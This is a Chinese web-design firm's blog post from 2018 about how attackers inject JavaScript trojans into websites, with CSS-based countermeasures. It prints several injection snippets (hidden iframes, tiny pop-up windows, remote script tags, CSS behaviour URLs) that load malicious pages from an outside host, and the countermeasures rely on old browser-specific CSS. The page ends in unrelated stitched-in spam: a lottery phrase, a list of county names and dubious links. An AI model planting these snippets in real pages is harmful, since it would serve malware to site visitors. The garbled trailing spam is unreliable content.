<em id="dx444"><object id="dx444"><input id="dx444"></input></object></em>
新聞觀點

js掛馬的方法及如何防止網站被掛馬

標簽: js掛馬 ? ? | 作者:錦明網絡| VISITORS: | 來源:錦明網絡
11
Oct
2018

最近有朋友說自己的網站平時并未作弊,文章也都是原創的,更新很穩定??刹恢罏槭裁淳W站突然就被各大搜索引擎降權了,一直找不到原因。最后發現是網站被掛馬了,導致網站被連累了。在此,借助錦明網絡的平臺,給大家簡單的介紹下js掛馬的方法及如何防止網站被掛馬。

常見JS掛馬方法及如何防止網站被黑客掛馬?

一、常見JS掛馬方法

現在最多見的JS掛馬方法有兩種,一種是直接將JavaScript腳本代碼寫在網頁中,當訪問者在瀏覽網頁時,惡意的掛馬腳本就會通過用戶的瀏覽器悄悄地打開網馬窗口,隱藏地運行。

這種方法使用的關鍵代碼如下:

window.open("http://www.k30302.cn/木馬.html","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");

這種代碼往往很長,很容易被安全工程師發現,而且沒有經驗的黑客也喜歡將“width”和“height”參數設為“0”,但是設置為0后,可能會出現惡意代碼不運行的情況。

另外一種JS掛馬方式是,黑客先將掛馬腳本代碼“document.write('<Iframe src="網頁木馬地址" ></iframe>')”,寫入Windows中的寫字板另存為后綴為.js的腳本文件,并上傳到自己指定的網址。這時黑客只需要在受害者 的網站中寫入:

<script src="http://www.k30302.cn/木馬腳本.js"></script>

或者

document.write("<div style='display:none'>")
  document.write("<iframe src="網頁木馬地址" width="0" height="0" scrolling="no" frameborder="0"></iframe>")
  document.write("</div>")

就成功地將木馬掛到了對方的網頁中了。

錦明網絡提示:黑客還可以根據情況隨機變換插入的JS掛馬方法,例如黑客有可能會將腳本寫為:

<div style="behaviour: url(http://www.k30302.cn/木馬腳本.js);">

或者:

<iframe src="vbscript:[掛馬腳本]">

 

二、如何防止網站被黑客掛馬?

防第一種JS掛馬方式,不方便,用得非常少,而第二種JS掛馬方式才是當前主流的,所以我們主要針對它進行防御。方法就是阻止Src請求的異地外域的JS腳本,代碼如下:

iframe{mdy1:expression(this.src='about:blank',this.outerHTML='');}
  script{mzm2:expression((this.src.toLowerCase().indexOf('http')==0)?document.write('木馬被成功隔離!'):'');}

不過這種方法的缺點就是網站的訪問者將不能看到被掛了JS木馬的相關網頁。

所以我們為安全工程師提供了一段可以中止JS腳本運行的CSS代碼,這段代碼會讓異地外域的JS文件在使用document.write()時,被 document.close()強制關閉。這個時侯JS掛馬的內容往往還沒有來得及寫完,只有部分被強制輸出了,Writer后面的內容再不會被寫入訪 問者的電腦中,從而起到防范JS腳本掛馬的作用。

讓JS木馬的進程迅速中止

在 <head> </head> 之間加入如下代碼:

屏蔽script和iframe

<style type="text/css" id="LinrStudio">
  /*<![CDATA[*/
  iframe{nhk1:expression(this.src='about:blank',this.outerHTML='');}
  script{ngz1:expression((this.src.indexOf('http')==0)?document.close():'');
  /*]]>*/
  </style>

單屏蔽script

<style type="text/css" id="LinrStudio">
  /*<![CDATA[*/
  /*iframe{nhk1:expression(this.src='about:blank',this.outerHTML='');}*/
  script{ngz1:expression((this.src.indexOf('http')==0)?document.close():'');}
  /*]]>*/
  </style>

如果有朋友發現自己的網站有被掛馬的現象,不妨用這種方法試下。由此可見,平時檢查代碼是維護網站的重要部分,而代碼的簡潔性又是至關重要的。

轉載聲明:本文由滕州網站優化-錦明SEO網絡整理發布
轉載請注明來源:http://www.k30302.cn/new/jianzhan/202.html
相關新聞
最新新聞
最新案例
錦明網絡—幫助企業塑造網絡品牌影響力,您身邊的網絡營銷專家!
分享按鈕 2018年一期东方心经 绥中县| 池州市| 莎车县| 绩溪县| 高邮市| 洞头县| 临潭县| 射阳县| 怀宁县| 金沙县| 潜江市| 延吉市| 宝坻区| 洪洞县| 磐安县| 怀来县| 多伦县| 潮州市| 肇东市| 玛沁县| 铜陵市| 陆丰市| 霸州市| 肥城市| 米林县| 沾益县| 江门市| 如皋市| 太谷县| 河东区| 万安县| 柳江县| 龙州县| 泗水县| 新蔡县| 金川县| 广平县| 博野县| 平昌县| 广州市| 新乡县| http://china.sina14s.pw http://www.111radio.top http://www.lsj1gn.pw http://china.tt18pc.top http://www.112forsale.top http://v.sina0ehu.pw